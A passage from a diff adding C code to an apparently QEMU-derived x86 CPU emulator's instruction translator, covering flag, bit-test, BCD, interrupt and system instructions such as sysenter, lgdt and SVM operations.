tcg_const_i32(tcg_ctx, (TF_MASK | + AC_MASK | + ID_MASK | + NT_MASK | + IF_MASK) + & 0xffff)); + } + } else { + if (dflag != MO_16) { + gen_helper_write_eflags(tcg_ctx, cpu_env, *cpu_T[0], + tcg_const_i32(tcg_ctx, (TF_MASK | AC_MASK | + ID_MASK | NT_MASK))); + } else { + gen_helper_write_eflags(tcg_ctx, cpu_env, *cpu_T[0], + tcg_const_i32(tcg_ctx, (TF_MASK | AC_MASK | + ID_MASK | NT_MASK) + & 0xffff)); + } + } + } + gen_pop_update(s, ot); + set_cc_op(s, CC_OP_EFLAGS); + /* abort translation because TF/AC flag may change */ + gen_jmp_im(s, s->pc - s->cs_base); + gen_eob(s); + } + break; + case 0x9e: /* sahf */ + if (CODE64(s) && !(s->cpuid_ext3_features & CPUID_EXT3_LAHF_LM)) + goto illegal_op; + gen_op_mov_v_reg(tcg_ctx, MO_8, *cpu_T[0], R_AH); + gen_compute_eflags(s); + tcg_gen_andi_tl(tcg_ctx, cpu_cc_src, cpu_cc_src, CC_O); + tcg_gen_andi_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], CC_S | CC_Z | CC_A | CC_P | CC_C); + tcg_gen_or_tl(tcg_ctx, cpu_cc_src, cpu_cc_src, *cpu_T[0]); + break; + case 0x9f: /* lahf */ + if (CODE64(s) && !(s->cpuid_ext3_features & CPUID_EXT3_LAHF_LM)) + goto illegal_op; + gen_compute_eflags(s); + /* Note: gen_compute_eflags() only gives the condition codes */ + tcg_gen_ori_tl(tcg_ctx, *cpu_T[0], cpu_cc_src, 0x02); + gen_op_mov_reg_v(tcg_ctx, MO_8, R_AH, *cpu_T[0]); + break; + case 0xf5: /* cmc */ + gen_compute_eflags(s); + tcg_gen_xori_tl(tcg_ctx, cpu_cc_src, cpu_cc_src, CC_C); + break; + case 0xf8: /* clc */ + gen_compute_eflags(s); + tcg_gen_andi_tl(tcg_ctx, cpu_cc_src, cpu_cc_src, ~CC_C); + break; + case 0xf9: /* stc */ + gen_compute_eflags(s); + tcg_gen_ori_tl(tcg_ctx, cpu_cc_src, cpu_cc_src, CC_C); + break; + case 0xfc: /* cld */ + tcg_gen_movi_i32(tcg_ctx, cpu_tmp2_i32, 1); + tcg_gen_st_i32(tcg_ctx, cpu_tmp2_i32, cpu_env, offsetof(CPUX86State, df)); + break; + case 0xfd: /* std */ + tcg_gen_movi_i32(tcg_ctx, cpu_tmp2_i32, -1); + tcg_gen_st_i32(tcg_ctx, cpu_tmp2_i32, cpu_env, offsetof(CPUX86State, df)); + break; + + /************************/ + 
/* bit operations */ + case 0x1ba: /* bt/bts/btr/btc Gv, im */ + ot = dflag; + modrm = cpu_ldub_code(env, s->pc++); + op = (modrm >> 3) & 7; + mod = (modrm >> 6) & 3; + rm = (modrm & 7) | REX_B(s); + if (mod != 3) { + s->rip_offset = 1; + gen_lea_modrm(env, s, modrm); + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + } else { + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], rm); + } + /* load shift */ + val = cpu_ldub_code(env, s->pc++); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[1], val); + if (op < 4) + goto illegal_op; + op -= 4; + goto bt_op; + case 0x1a3: /* bt Gv, Ev */ + op = 0; + goto do_btx; + case 0x1ab: /* bts */ + op = 1; + goto do_btx; + case 0x1b3: /* btr */ + op = 2; + goto do_btx; + case 0x1bb: /* btc */ + op = 3; + do_btx: + ot = dflag; + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + mod = (modrm >> 6) & 3; + rm = (modrm & 7) | REX_B(s); + gen_op_mov_v_reg(tcg_ctx, MO_32, *cpu_T[1], reg); + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + /* specific case: we need to add a displacement */ + gen_exts(tcg_ctx, ot, *cpu_T[1]); + tcg_gen_sari_tl(tcg_ctx, cpu_tmp0, *cpu_T[1], 3 + ot); + tcg_gen_shli_tl(tcg_ctx, cpu_tmp0, cpu_tmp0, ot); + tcg_gen_add_tl(tcg_ctx, cpu_A0, cpu_A0, cpu_tmp0); + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + } else { + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], rm); + } + bt_op: + tcg_gen_andi_tl(tcg_ctx, *cpu_T[1], *cpu_T[1], (1 << (3 + ot)) - 1); + tcg_gen_shr_tl(tcg_ctx, cpu_tmp4, *cpu_T[0], *cpu_T[1]); + switch(op) { + case 0: + break; + case 1: + tcg_gen_movi_tl(tcg_ctx, cpu_tmp0, 1); + tcg_gen_shl_tl(tcg_ctx, cpu_tmp0, cpu_tmp0, *cpu_T[1]); + tcg_gen_or_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], cpu_tmp0); + break; + case 2: + tcg_gen_movi_tl(tcg_ctx, cpu_tmp0, 1); + tcg_gen_shl_tl(tcg_ctx, cpu_tmp0, cpu_tmp0, *cpu_T[1]); + tcg_gen_andc_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], cpu_tmp0); + break; + default: + case 3: + tcg_gen_movi_tl(tcg_ctx, cpu_tmp0, 1); + tcg_gen_shl_tl(tcg_ctx, cpu_tmp0, cpu_tmp0, *cpu_T[1]); + 
tcg_gen_xor_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], cpu_tmp0); + break; + } + if (op != 0) { + if (mod != 3) { + gen_op_st_v(s, ot, *cpu_T[0], cpu_A0); + } else { + gen_op_mov_reg_v(tcg_ctx, ot, rm, *cpu_T[0]); + } + } + + /* Delay all CC updates until after the store above. Note that + C is the result of the test, Z is unchanged, and the others + are all undefined. */ + switch (s->cc_op) { + case CC_OP_MULB: case CC_OP_MULW: case CC_OP_MULL: case CC_OP_MULQ: //case CC_OP_MULB ... CC_OP_MULQ: + case CC_OP_ADDB: case CC_OP_ADDW: case CC_OP_ADDL: case CC_OP_ADDQ: //case CC_OP_ADDB ... CC_OP_ADDQ: + case CC_OP_ADCB: case CC_OP_ADCW: case CC_OP_ADCL: case CC_OP_ADCQ: //case CC_OP_ADCB ... CC_OP_ADCQ: + case CC_OP_SUBB: case CC_OP_SUBW: case CC_OP_SUBL: case CC_OP_SUBQ: //case CC_OP_SUBB ... CC_OP_SUBQ: + case CC_OP_SBBB: case CC_OP_SBBW: case CC_OP_SBBL: case CC_OP_SBBQ: //case CC_OP_SBBB ... CC_OP_SBBQ: + case CC_OP_LOGICB: case CC_OP_LOGICW: case CC_OP_LOGICL: case CC_OP_LOGICQ: //case CC_OP_LOGICB ... CC_OP_LOGICQ: + case CC_OP_INCB: case CC_OP_INCW: case CC_OP_INCL: case CC_OP_INCQ: //case CC_OP_INCB ... CC_OP_INCQ: + case CC_OP_DECB: case CC_OP_DECW: case CC_OP_DECL: case CC_OP_DECQ: //case CC_OP_DECB ... CC_OP_DECQ: + case CC_OP_SHLB: case CC_OP_SHLW: case CC_OP_SHLL: case CC_OP_SHLQ: //case CC_OP_SHLB ... CC_OP_SHLQ: + case CC_OP_SARB: case CC_OP_SARW: case CC_OP_SARL: case CC_OP_SARQ: //case CC_OP_SARB ... CC_OP_SARQ: + case CC_OP_BMILGB: case CC_OP_BMILGW: case CC_OP_BMILGL: case CC_OP_BMILGQ: //case CC_OP_BMILGB ... CC_OP_BMILGQ: + /* Z was going to be computed from the non-zero status of CC_DST. + We can get that same Z value (and the new C value) by leaving + CC_DST alone, setting CC_SRC, and using a CC_OP_SAR of the + same width. */ + tcg_gen_mov_tl(tcg_ctx, cpu_cc_src, cpu_tmp4); + set_cc_op(s, ((s->cc_op - CC_OP_MULB) & 3) + CC_OP_SARB); + break; + default: + /* Otherwise, generate EFLAGS and replace the C bit. 
*/ + gen_compute_eflags(s); + tcg_gen_deposit_tl(tcg_ctx, cpu_cc_src, cpu_cc_src, cpu_tmp4, + ctz32(CC_C), 1); + break; + } + break; + case 0x1bc: /* bsf / tzcnt */ + case 0x1bd: /* bsr / lzcnt */ + ot = dflag; + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + gen_extu(tcg_ctx, ot, *cpu_T[0]); + + /* Note that lzcnt and tzcnt are in different extensions. */ + if ((prefixes & PREFIX_REPZ) + && (b & 1 + ? s->cpuid_ext3_features & CPUID_EXT3_ABM + : s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI1)) { + int size = 8 << ot; + tcg_gen_mov_tl(tcg_ctx, cpu_cc_src, *cpu_T[0]); + if (b & 1) { + /* For lzcnt, reduce the target_ulong result by the + number of zeros that we expect to find at the top. */ + gen_helper_clz(tcg_ctx, *cpu_T[0], *cpu_T[0]); + tcg_gen_subi_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], TARGET_LONG_BITS - size); + } else { + /* For tzcnt, a zero input must return the operand size: + force all bits outside the operand size to 1. */ + target_ulong mask = (target_ulong)-2 << (size - 1); + tcg_gen_ori_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], mask); + gen_helper_ctz(tcg_ctx, *cpu_T[0], *cpu_T[0]); + } + /* For lzcnt/tzcnt, C and Z bits are defined and are + related to the result. */ + gen_op_update1_cc(tcg_ctx); + set_cc_op(s, CC_OP_BMILGB + ot); + } else { + /* For bsr/bsf, only the Z bit is defined and it is related + to the input and not the result. */ + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, *cpu_T[0]); + set_cc_op(s, CC_OP_LOGICB + ot); + if (b & 1) { + /* For bsr, return the bit index of the first 1 bit, + not the count of leading zeros. */ + gen_helper_clz(tcg_ctx, *cpu_T[0], *cpu_T[0]); + tcg_gen_xori_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], TARGET_LONG_BITS - 1); + } else { + gen_helper_ctz(tcg_ctx, *cpu_T[0], *cpu_T[0]); + } + /* ??? The manual says that the output is undefined when the + input is zero, but real hardware leaves it unchanged, and + real programs appear to depend on that. 
*/ + tcg_gen_movi_tl(tcg_ctx, cpu_tmp0, 0); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, *cpu_T[0], cpu_cc_dst, cpu_tmp0, + *cpu_regs[reg], *cpu_T[0]); + } + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + break; + /************************/ + /* bcd */ + case 0x27: /* daa */ + if (CODE64(s)) + goto illegal_op; + gen_update_cc_op(s); + gen_helper_daa(tcg_ctx, cpu_env); + set_cc_op(s, CC_OP_EFLAGS); + break; + case 0x2f: /* das */ + if (CODE64(s)) + goto illegal_op; + gen_update_cc_op(s); + gen_helper_das(tcg_ctx, cpu_env); + set_cc_op(s, CC_OP_EFLAGS); + break; + case 0x37: /* aaa */ + if (CODE64(s)) + goto illegal_op; + gen_update_cc_op(s); + gen_helper_aaa(tcg_ctx, cpu_env); + set_cc_op(s, CC_OP_EFLAGS); + break; + case 0x3f: /* aas */ + if (CODE64(s)) + goto illegal_op; + gen_update_cc_op(s); + gen_helper_aas(tcg_ctx, cpu_env); + set_cc_op(s, CC_OP_EFLAGS); + break; + case 0xd4: /* aam */ + if (CODE64(s)) + goto illegal_op; + val = cpu_ldub_code(env, s->pc++); + if (val == 0) { + gen_exception(s, EXCP00_DIVZ, pc_start - s->cs_base); + } else { + gen_helper_aam(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, val)); + set_cc_op(s, CC_OP_LOGICB); + } + break; + case 0xd5: /* aad */ + if (CODE64(s)) + goto illegal_op; + val = cpu_ldub_code(env, s->pc++); + gen_helper_aad(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, val)); + set_cc_op(s, CC_OP_LOGICB); + break; + /************************/ + /* misc */ + case 0x90: /* nop */ + /* XXX: correct lock test for all insn */ + if (prefixes & PREFIX_LOCK) { + goto illegal_op; + } + /* If REX_B is set, then this is xchg eax, r8d, not a nop. 
*/ + if (REX_B(s)) { + goto do_xchg_reg_eax; + } + if (prefixes & PREFIX_REPZ) { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_pause(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, s->pc - pc_start)); + s->is_jmp = DISAS_TB_JUMP; + } + break; + case 0x9b: /* fwait */ + if ((s->flags & (HF_MP_MASK | HF_TS_MASK)) == + (HF_MP_MASK | HF_TS_MASK)) { + gen_exception(s, EXCP07_PREX, pc_start - s->cs_base); + } else { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_fwait(tcg_ctx, cpu_env); + } + break; + case 0xcc: /* int3 */ + gen_interrupt(s, EXCP03_INT3, pc_start - s->cs_base, s->pc - s->cs_base); + break; + case 0xcd: /* int N */ + val = cpu_ldub_code(env, s->pc++); + if (s->vm86 && s->iopl != 3) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + gen_interrupt(s, val, pc_start - s->cs_base, s->pc - s->cs_base); + } + break; + case 0xce: /* into */ + if (CODE64(s)) + goto illegal_op; + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_into(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, s->pc - pc_start)); + break; +#ifdef WANT_ICEBP + case 0xf1: /* icebp (undocumented, exits to external debugger) */ + gen_svm_check_intercept(s, pc_start, SVM_EXIT_ICEBP); +#if 1 + gen_debug(s, pc_start - s->cs_base); +#else + /* start debug */ + tb_flush(env); + qemu_set_log(CPU_LOG_INT | CPU_LOG_TB_IN_ASM); +#endif + break; +#endif + case 0xfa: /* cli */ + if (!s->vm86) { + if (s->cpl <= s->iopl) { + gen_helper_cli(tcg_ctx, cpu_env); + } else { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } + } else { + if (s->iopl == 3) { + gen_helper_cli(tcg_ctx, cpu_env); + } else { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } + } + break; + case 0xfb: /* sti */ + if (!s->vm86) { + if (s->cpl <= s->iopl) { + gen_sti: + gen_helper_sti(tcg_ctx, cpu_env); + /* interruptions are enabled only the first insn after sti */ + /* If several instructions disable interrupts, only the + _first_ does 
it */ + if (!(s->tb->flags & HF_INHIBIT_IRQ_MASK)) + gen_helper_set_inhibit_irq(tcg_ctx, cpu_env); + /* give a chance to handle pending irqs */ + gen_jmp_im(s, s->pc - s->cs_base); + gen_eob(s); + } else { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } + } else { + if (s->iopl == 3) { + goto gen_sti; + } else { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } + } + break; + case 0x62: /* bound */ + if (CODE64(s)) + goto illegal_op; + ot = dflag; + modrm = cpu_ldub_code(env, s->pc++); + reg = (modrm >> 3) & 7; + mod = (modrm >> 6) & 3; + if (mod == 3) + goto illegal_op; + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], reg); + gen_lea_modrm(env, s, modrm); + gen_jmp_im(s, pc_start - s->cs_base); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + if (ot == MO_16) { + gen_helper_boundw(tcg_ctx, cpu_env, cpu_A0, cpu_tmp2_i32); + } else { + gen_helper_boundl(tcg_ctx, cpu_env, cpu_A0, cpu_tmp2_i32); + } + break; + case 0x1c8: case 0x1c9: case 0x1ca: case 0x1cb: + case 0x1cc: case 0x1cd: case 0x1ce: case 0x1cf: /* bswap reg */ + reg = (b & 7) | REX_B(s); +#ifdef TARGET_X86_64 + if (dflag == MO_64) { + gen_op_mov_v_reg(tcg_ctx, MO_64, *cpu_T[0], reg); + tcg_gen_bswap64_i64(tcg_ctx, *cpu_T[0], *cpu_T[0]); + gen_op_mov_reg_v(tcg_ctx, MO_64, reg, *cpu_T[0]); + } else +#endif + { + gen_op_mov_v_reg(tcg_ctx, MO_32, *cpu_T[0], reg); + tcg_gen_ext32u_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + tcg_gen_bswap32_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + gen_op_mov_reg_v(tcg_ctx, MO_32, reg, *cpu_T[0]); + } + break; + case 0xd6: /* salc */ + if (CODE64(s)) + goto illegal_op; + gen_compute_eflags_c(s, *cpu_T[0]); + tcg_gen_neg_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + gen_op_mov_reg_v(tcg_ctx, MO_8, R_EAX, *cpu_T[0]); + break; + case 0xe0: /* loopnz */ + case 0xe1: /* loopz */ + case 0xe2: /* loop */ + case 0xe3: /* jecxz */ + { + int l1, l2, l3; + + tval = (int8_t)insn_get(env, s, MO_8); + next_eip = s->pc - s->cs_base; + tval += next_eip; + if (dflag == MO_16) { + tval &= 
0xffff; + } + + l1 = gen_new_label(tcg_ctx); + l2 = gen_new_label(tcg_ctx); + l3 = gen_new_label(tcg_ctx); + b &= 3; + switch(b) { + case 0: /* loopnz */ + case 1: /* loopz */ + gen_op_add_reg_im(tcg_ctx, s->aflag, R_ECX, -1); + gen_op_jz_ecx(tcg_ctx, s->aflag, l3); + gen_jcc1(s, (JCC_Z << 1) | (b ^ 1), l1); + break; + case 2: /* loop */ + gen_op_add_reg_im(tcg_ctx, s->aflag, R_ECX, -1); + gen_op_jnz_ecx(tcg_ctx, s->aflag, l1); + break; + default: + case 3: /* jcxz */ + gen_op_jz_ecx(tcg_ctx, s->aflag, l1); + break; + } + + gen_set_label(tcg_ctx, l3); + gen_jmp_im(s, next_eip); + tcg_gen_br(tcg_ctx, l2); + + gen_set_label(tcg_ctx, l1); + gen_jmp_im(s, tval); + gen_set_label(tcg_ctx, l2); + gen_eob(s); + } + break; + case 0x130: /* wrmsr */ + case 0x132: /* rdmsr */ + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + if (b & 2) { + gen_helper_rdmsr(tcg_ctx, cpu_env); + } else { + gen_helper_wrmsr(tcg_ctx, cpu_env); + } + } + break; + case 0x131: /* rdtsc */ + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_rdtsc(tcg_ctx, cpu_env); + break; + case 0x133: /* rdpmc */ + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_rdpmc(tcg_ctx, cpu_env); + break; + case 0x134: /* sysenter */ + /* For Intel SYSENTER is valid on 64-bit */ + if (CODE64(s) && env->cpuid_vendor1 != CPUID_VENDOR_INTEL_1) + goto illegal_op; + + if (!s->pe) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_sysenter(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, s->pc - pc_start)); + gen_eob(s); + } + break; + case 0x135: /* sysexit */ + /* For Intel SYSEXIT is valid on 64-bit */ + if (CODE64(s) && env->cpuid_vendor1 != CPUID_VENDOR_INTEL_1) + goto illegal_op; + if (!s->pe) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + gen_update_cc_op(s); + 
gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_sysexit(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, dflag - 1)); + gen_eob(s); + } + break; +#ifdef TARGET_X86_64 + case 0x105: /* syscall */ + /* XXX: is it usable in real mode ? */ + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_syscall(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, s->pc - pc_start)); + gen_eob(s); + break; + case 0x107: /* sysret */ + if (!s->pe) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_sysret(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, dflag - 1)); + /* condition codes are modified only in long mode */ + if (s->lma) { + set_cc_op(s, CC_OP_EFLAGS); + } + gen_eob(s); + } + break; +#endif + case 0x1a2: /* cpuid */ + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_cpuid(tcg_ctx, cpu_env); + break; + case 0xf4: /* hlt */ + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_hlt(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, s->pc - pc_start)); + s->is_jmp = DISAS_TB_JUMP; + } + break; + case 0x100: + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + op = (modrm >> 3) & 7; + switch(op) { + case 0: /* sldt */ + if (!s->pe || s->vm86) + goto illegal_op; + gen_svm_check_intercept(s, pc_start, SVM_EXIT_LDTR_READ); + tcg_gen_ld32u_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,ldt.selector)); + ot = mod == 3 ? 
dflag : MO_16; + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 1); + break; + case 2: /* lldt */ + if (!s->pe || s->vm86) + goto illegal_op; + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + gen_svm_check_intercept(s, pc_start, SVM_EXIT_LDTR_WRITE); + gen_ldst_modrm(env, s, modrm, MO_16, OR_TMP0, 0); + gen_jmp_im(s, pc_start - s->cs_base); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + gen_helper_lldt(tcg_ctx, cpu_env, cpu_tmp2_i32); + } + break; + case 1: /* str */ + if (!s->pe || s->vm86) + goto illegal_op; + gen_svm_check_intercept(s, pc_start, SVM_EXIT_TR_READ); + tcg_gen_ld32u_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,tr.selector)); + ot = mod == 3 ? dflag : MO_16; + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 1); + break; + case 3: /* ltr */ + if (!s->pe || s->vm86) + goto illegal_op; + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + gen_svm_check_intercept(s, pc_start, SVM_EXIT_TR_WRITE); + gen_ldst_modrm(env, s, modrm, MO_16, OR_TMP0, 0); + gen_jmp_im(s, pc_start - s->cs_base); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + gen_helper_ltr(tcg_ctx, cpu_env, cpu_tmp2_i32); + } + break; + case 4: /* verr */ + case 5: /* verw */ + if (!s->pe || s->vm86) + goto illegal_op; + gen_ldst_modrm(env, s, modrm, MO_16, OR_TMP0, 0); + gen_update_cc_op(s); + if (op == 4) { + gen_helper_verr(tcg_ctx, cpu_env, *cpu_T[0]); + } else { + gen_helper_verw(tcg_ctx, cpu_env, *cpu_T[0]); + } + set_cc_op(s, CC_OP_EFLAGS); + break; + default: + goto illegal_op; + } + break; + case 0x101: + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + op = (modrm >> 3) & 7; + rm = modrm & 7; + switch(op) { + case 0: /* sgdt */ + if (mod == 3) + goto illegal_op; + gen_svm_check_intercept(s, pc_start, SVM_EXIT_GDTR_READ); + gen_lea_modrm(env, s, modrm); + tcg_gen_ld32u_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State, gdt.limit)); + gen_op_st_v(s, MO_16, *cpu_T[0], 
cpu_A0); + gen_add_A0_im(s, 2); + tcg_gen_ld_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State, gdt.base)); + if (dflag == MO_16) { + tcg_gen_andi_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], 0xffffff); + } + gen_op_st_v(s, CODE64(s) + MO_32, *cpu_T[0], cpu_A0); + break; + case 1: + if (mod == 3) { + switch (rm) { + case 0: /* monitor */ + if (!(s->cpuid_ext_features & CPUID_EXT_MONITOR) || + s->cpl != 0) + goto illegal_op; + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + tcg_gen_mov_tl(tcg_ctx, cpu_A0, *cpu_regs[R_EAX]); + gen_extu(tcg_ctx, s->aflag, cpu_A0); + gen_add_A0_ds_seg(s); + gen_helper_monitor(tcg_ctx, cpu_env, cpu_A0); + break; + case 1: /* mwait */ + if (!(s->cpuid_ext_features & CPUID_EXT_MONITOR) || + s->cpl != 0) + goto illegal_op; + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_mwait(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, s->pc - pc_start)); + gen_eob(s); + break; + case 2: /* clac */ + if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_SMAP) || + s->cpl != 0) { + goto illegal_op; + } + gen_helper_clac(tcg_ctx, cpu_env); + gen_jmp_im(s, s->pc - s->cs_base); + gen_eob(s); + break; + case 3: /* stac */ + if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_SMAP) || + s->cpl != 0) { + goto illegal_op; + } + gen_helper_stac(tcg_ctx, cpu_env); + gen_jmp_im(s, s->pc - s->cs_base); + gen_eob(s); + break; + default: + goto illegal_op; + } + } else { /* sidt */ + gen_svm_check_intercept(s, pc_start, SVM_EXIT_IDTR_READ); + gen_lea_modrm(env, s, modrm); + tcg_gen_ld32u_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State, idt.limit)); + gen_op_st_v(s, MO_16, *cpu_T[0], cpu_A0); + gen_add_A0_im(s, 2); + tcg_gen_ld_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State, idt.base)); + if (dflag == MO_16) { + tcg_gen_andi_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], 0xffffff); + } + gen_op_st_v(s, CODE64(s) + MO_32, *cpu_T[0], cpu_A0); + } + break; + case 2: /* lgdt */ + case 3: /* lidt */ + if (mod == 3) { + gen_update_cc_op(s); + gen_jmp_im(s, 
pc_start - s->cs_base); + switch(rm) { + case 0: /* VMRUN */ + if (!(s->flags & HF_SVME_MASK) || !s->pe) + goto illegal_op; + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + break; + } else { + gen_helper_vmrun(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, s->aflag - 1), + tcg_const_i32(tcg_ctx, s->pc - pc_start)); + tcg_gen_exit_tb(tcg_ctx, 0); + s->is_jmp = DISAS_TB_JUMP; + } + break; + case 1: /* VMMCALL */ + if (!(s->flags & HF_SVME_MASK)) + goto illegal_op; + gen_helper_vmmcall(tcg_ctx, cpu_env); + break; + case 2: /* VMLOAD */ + if (!(s->flags & HF_SVME_MASK) || !s->pe) + goto illegal_op; + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + break; + } else { + gen_helper_vmload(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, s->aflag - 1)); + } + break; + case 3: /* VMSAVE */ + if (!(s->flags & HF_SVME_MASK) || !s->pe) + goto illegal_op; + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + break; + } else { + gen_helper_vmsave(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, s->aflag - 1)); + } + break; + case 4: /* STGI */ + if ((!(s->flags & HF_SVME_MASK) && + !(s->cpuid_ext3_features & CPUID_EXT3_SKINIT)) || + !s->pe) + goto illegal_op; + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + break; + } else { + gen_helper_stgi(tcg_ctx, cpu_env); + } + break; + case 5: /* CLGI */ + if (!(s->flags & HF_SVME_MASK) || !s->pe) + goto illegal_op; + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + break; + } else { + gen_helper_clgi(tcg_ctx, cpu_env); + } + break; + case 6: /* SKINIT */ + if ((!(s->flags & HF_SVME_MASK) && + !(s->cpuid_ext3_features & CPUID_EXT3_SKINIT)) || + !s->pe) + goto illegal_op; + gen_helper_skinit(tcg_ctx, cpu_env); + break; + case 7: /* INVLPGA */ + if (!(s->flags & HF_SVME_MASK) || !s->pe) + goto illegal_op; + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + break; + } else { + gen_helper_invlpga(tcg_ctx, 
cpu_env, + tcg_const_i32(tcg_ctx, s->aflag - 1)); + } + break; + default: + goto illegal_op; + } + } else if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + gen_svm_check_intercept(s, pc_start, + op==2 ? SVM_EXIT_GDTR_WRITE : SVM_EXIT_IDTR_WRITE); + gen_lea_modrm(env, s, modrm); + gen_op_ld_v(s, MO_16, *cpu_T[1], cpu_A0); + gen_add_A0_im(s, 2); + gen_op_ld_v(s, CODE64(s) + MO_32, *cpu_T[0], cpu_A0); + if (dflag == MO_16) { + tcg_gen_andi_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], 0xffffff); + } + if (op == 2) { + tcg_gen_st_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,gdt.base)); + tcg_gen_st32_tl(tcg_ctx, *cpu_T[1], cpu_env, offsetof(CPUX86State,gdt.limit)); + } else { + tcg_gen_st_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,idt.base)); + tcg_gen_st32_tl(tcg_ctx, *cpu_T[1], cpu_env, offsetof(CPUX86State,idt.limit)); + } + } + break; + case 4: /* smsw */ + gen_svm_check_intercept(s, pc_start, SVM_EXIT_READ_CR0); +#if defined TARGET_X86_64 && defined HOST_WORDS_BIGENDIAN + 